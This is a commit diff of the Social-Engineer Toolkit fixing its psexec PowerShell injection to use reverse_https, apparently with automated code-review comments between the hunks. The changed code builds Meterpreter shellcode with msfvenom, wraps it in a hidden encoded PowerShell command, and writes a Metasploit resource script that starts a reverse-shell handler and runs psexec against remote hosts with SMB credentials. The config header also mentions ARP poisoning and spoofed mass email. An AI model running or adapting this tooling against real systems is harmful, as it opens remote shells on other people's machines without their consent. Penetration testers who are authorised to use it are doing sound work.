this fixes a psexec issue within SET
This commit is contained in:
parent
fdeae74159
commit
abd935679f
7 changed files with 50 additions and 46 deletions
|
@ -1,3 +1,10 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.9
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* config cleanup
|
||||
* fixed an issue when using psexec injection it would use reverse_tcp instead of reverse_https this was due to the set.config being used
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.8
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -40,7 +40,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
|
|||
# here we check to ensure we have the latest version
|
||||
with open("/etc/setoolkit/set.config") as fileopen:
|
||||
data = fileopen.read()
|
||||
if "CONFIG_VERSION=7.2" not in data:
|
||||
|
||||
if "CONFIG_VERSION=7.3.9" not in data:
|
||||
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
|
||||
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
|
||||
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
|
||||
|
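Review bot: The new `if "CONFIG_VERSION=7.3.9" not in data:` line is a substring match against a version string that is hand-copied into the `config.baseline` header (the `## CONFIG_VERSION=7.3.9 ##` line in that file's first hunk), so both places must be bumped by hand on every release and nothing fails loudly when they drift. A single module-level constant, `CONFIG_VERSION = "7.3.9"`, used as `if "CONFIG_VERSION=" + CONFIG_VERSION not in data:`, keeps the check in one place. Worth noting while here: the unchanged `shutil.move(...)` to the fixed `set.config.bak` name silently overwrites the backup left by the previous upgrade, so a user who customised the config more than once keeps only the most recent copy. The module-level code around this check lies outside the hunk.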
|
|
@ -1,31 +1,31 @@
|
|||
##################################################################################################
|
||||
##################################################################################################
|
||||
## ##
|
||||
## The following config file will allow you to customize settings within ##
|
||||
## the Social-Engineer Toolkit. The lines that do not have comment code ##
|
||||
## ("#") are the fields you want to toy with. They are pretty easy to ##
|
||||
## understand. ##
|
||||
## ##
|
||||
## The Metasploit path is the default path for where Metasploit is located. ##
|
||||
## Metasploit is required for SET to function properly. ##
|
||||
## ##
|
||||
## The "ETTERCAP" option specifies if you want to use ARP cache poisoning in ##
|
||||
## conjunction with the web attacks; note that ARP cache poisoning is only ##
|
||||
## ##
|
||||
## The following config file will allow you to customize settings within ##
|
||||
## the Social-Engineer Toolkit. The lines that do not have comment code ##
|
||||
## ("#") are the fields you want to toy with. They are pretty easy to ##
|
||||
## understand. ##
|
||||
## ##
|
||||
## The Metasploit path is the default path for where Metasploit is located. ##
|
||||
## Metasploit is required for SET to function properly. ##
|
||||
## ##
|
||||
## The "ETTERCAP" option specifies if you want to use ARP cache poisoning in ##
|
||||
## conjunction with the web attacks; note that ARP cache poisoning is only ##
|
||||
## for internal subnets only and does not work against people on the Internet. ##
|
||||
## ##
|
||||
## ##
|
||||
## The "SENDMAIL" option allows you to spoof source IP addresses utilizing an ##
|
||||
## program called Sendmail. Sendmail is not installed by default on Kali. ##
|
||||
## To spoof email addresses when performing the mass email attacks, you must ##
|
||||
## install Sendmail manually using the command: "apt-get install sendmail" ##
|
||||
# ##
|
||||
## program called Sendmail. Sendmail is not installed by default on Kali. ##
|
||||
## To spoof email addresses when performing the mass email attacks, you must ##
|
||||
## install Sendmail manually using the command: "apt-get install sendmail" ##
|
||||
# ##
|
||||
## Note that "ETTERCAP" and "SENDMAIL" options only accept ON or OFF switches. ##
|
||||
## ##
|
||||
## Note that the "Metasploit_PATH" option cannot have a '/' after the folder name. ##
|
||||
## ##
|
||||
## There are additional options; read the comments for additional descriptions. ##
|
||||
## ##
|
||||
## CONFIG_VERSION=7.2 ##
|
||||
## ##
|
||||
## ##
|
||||
## Note that the "Metasploit_PATH" option cannot have a '/' after the folder name. ##
|
||||
## ##
|
||||
## There are additional options; read the comments for additional descriptions. ##
|
||||
## ##
|
||||
## CONFIG_VERSION=7.3.9 ##
|
||||
## ##
|
||||
##################################################################################################
|
||||
##################################################################################################
|
||||
#
|
||||
|
@ -189,8 +189,8 @@ POWERSHELL_INJECTION=ON
|
|||
#
|
||||
### This will allow you to change the Metasploit payload to whatever you want based on the PowerShell alphanumeric
|
||||
### injection attack. Specify this if PowerShell injection is enabled and you want to change it from the standard
|
||||
### "reverse_tcp" attack. Note that all payloads use x86; the process will automatically downgrade to 32-bit.
|
||||
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_tcp
|
||||
### "reverse_https" attack. Note that all payloads use x86; the process will automatically downgrade to 32-bit.
|
||||
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_https
|
||||
#
|
||||
### This option will spray multiple ports through PowerShell in an effort to get a port outbound.
|
||||
### Note that PowerShell injection must be enabled.
|
||||
|
|
|
@ -1 +1 @@
|
|||
7.3.8
|
||||
7.3.9
|
||||
|
|
|
@ -1389,7 +1389,6 @@ def socket_listener(port):
|
|||
|
||||
# generates powershell payload
|
||||
def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
|
||||
|
||||
# generate our shellcode first
|
||||
shellcode = metasploit_shellcode(payload, ipaddr, port)
|
||||
try:
|
||||
|
@ -1441,7 +1440,6 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
|
|||
"$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)
|
||||
|
||||
# unicode and base64 encode and return it
|
||||
|
||||
return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")
|
||||
|
||||
# generate base shellcode
|
||||
|
@ -1450,11 +1448,12 @@ def generate_shellcode(payload, ipaddr, port):
|
|||
msf_path = meta_path()
|
||||
# generate payload
|
||||
port = port.replace("LPORT=", "")
|
||||
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows --smallest -f c" %
|
||||
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows --smallest -f c" %
|
||||
(msf_path, payload, ipaddr, port), stdout=subprocess.PIPE, shell=True)
|
||||
data = proc.communicate()[0]
|
||||
data = data.decode('ascii')
|
||||
# start to format this a bit to get it ready
|
||||
#goat
|
||||
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=',
|
||||
'unsignedcharbuf[]=', "b'", "'", '\\n']
|
||||
for repl in repls:
|
||||
|
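Review bot: The rewritten `subprocess.Popen(...)` line still assembles the msfvenom invocation as a single string and runs it with `shell=True`, so `payload`, `ipaddr` and `port` (which has just had its `LPORT=` prefix stripped on the line above and originates from configuration or prompts) are interpreted by the shell instead of being passed as arguments; the two Popen lines differ only in the `-e x86/shikata_ga_nai` option, and the string-building is the same on both sides. Passing an argv list and dropping `shell=True` takes the shell out of the path: `proc = subprocess.Popen([msf_path + "msfvenom", "-p", payload, "LHOST=" + ipaddr, "LPORT=" + port, "StagerURILength=5", "StagerVerifySSLCert=false", "-a", "x86", "--platform", "windows", "--smallest", "-f", "c"], stdout=subprocess.PIPE)`. The `%smsfvenom` prefix relies on `msf_path` ending in a separator or being empty; the concatenation in the list form preserves that contract. `generate_shellcode` starts before and ends after this hunk.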
|
|
@ -74,8 +74,6 @@ try:
|
|||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
#prep_powershell_payload()
|
||||
|
||||
try:
|
||||
core.module_reload(src.payloads.powershell.prep)
|
||||
except:
|
||||
|
@ -85,12 +83,12 @@ try:
|
|||
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
|
||||
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
|
||||
|
||||
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
x86 = fileopen.read()
|
||||
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
# x86 = fileopen.read()
|
||||
x86 = open(core.setdir + "x86.powershell", "r").read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
#with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
|
||||
|
@ -101,19 +99,18 @@ try:
|
|||
filewrite.write("use multi/handler\n"
|
||||
"set payload windows/meterpreter/reverse_https\n"
|
||||
"set LPORT {0}\n"
|
||||
"set LHOST 0.0.0.0\n"
|
||||
"set LHOST {1}\n"
|
||||
"set EnableStageEncoding true\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit -j\n"
|
||||
"use auxiliary/admin/smb/psexec_command\n"
|
||||
"set RHOSTS {1}\n"
|
||||
"set SMBUser {2}\n"
|
||||
"set SMBPass {3}\n"
|
||||
"set SMBDomain {4}\n"
|
||||
"set THREADS {5}\n"
|
||||
"set COMMAND {6}\n"
|
||||
"set EnableStageEncoding {7}\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit\n".format(port, rhosts, username, password, domain, threads, command, stage_encoding))
|
||||
"set RHOSTS {2}\n"
|
||||
"set SMBUser {3}\n"
|
||||
"set SMBPass {4}\n"
|
||||
"set SMBDomain {5}\n"
|
||||
"set THREADS {6}\n"
|
||||
"set COMMAND {7}\n"
|
||||
"exploit\n".format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding))
|
||||
|
||||
# launch metasploit below
|
||||
core.print_status("Launching Metasploit.. This may take a few seconds.")
|
||||
|
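Review bot: The new `.format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding)` call passes nine arguments, but the rebuilt resource script only references `{0}` through `{7}`, so `stage_encoding` is now silently ignored (`str.format` does not reject surplus positional arguments) while the handler block at the top of the string sets `EnableStageEncoding true` unconditionally. Either drop the argument or wire it back in, e.g. `"set EnableStageEncoding {8}\n"` in the handler in place of the literal `true`, so the value the caller computed still has an effect; whether the `true` line is itself new or context cannot be recovered from this rendering. Separately, the previous hunk in this file replaces a `with open(...)` read with `x86 = open(core.setdir + "x86.powershell", "r").read()`, which never closes the handle; keeping the context-manager form avoids that. The enclosing `try:` block starts outside the hunk.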
|
|
@ -52,7 +52,7 @@ powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
|||
|
||||
# if we specified a hostname then default to reverse https/http
|
||||
if validate_ip(ipaddr) == False:
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_https"
|
||||
|
||||
# prompt what port to listen on for powershell then make an append to the current
|
||||
# metasploit answer file
|
||||
|
|
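Review bot: The comment directly above the changed line, `# if we specified a hostname then default to reverse https/http`, is now stale: the branch only ever selects `windows/meterpreter/reverse_https`, so it should read `# if we specified a hostname then default to reverse_https`. The assignment also silently discards whatever the user configured in `POWERSHELL_INJECT_PAYLOAD_X86` (read on the line named in the hunk header), which deserves a `core.print_status`-style message or at least a comment such as `# overrides POWERSHELL_INJECT_PAYLOAD_X86: reverse_tcp cannot take a hostname` so the override is not mistaken for a bug; the reason for the override is inferred, not visible here. The surrounding code appears to be module-level, and the hunk shows only this branch.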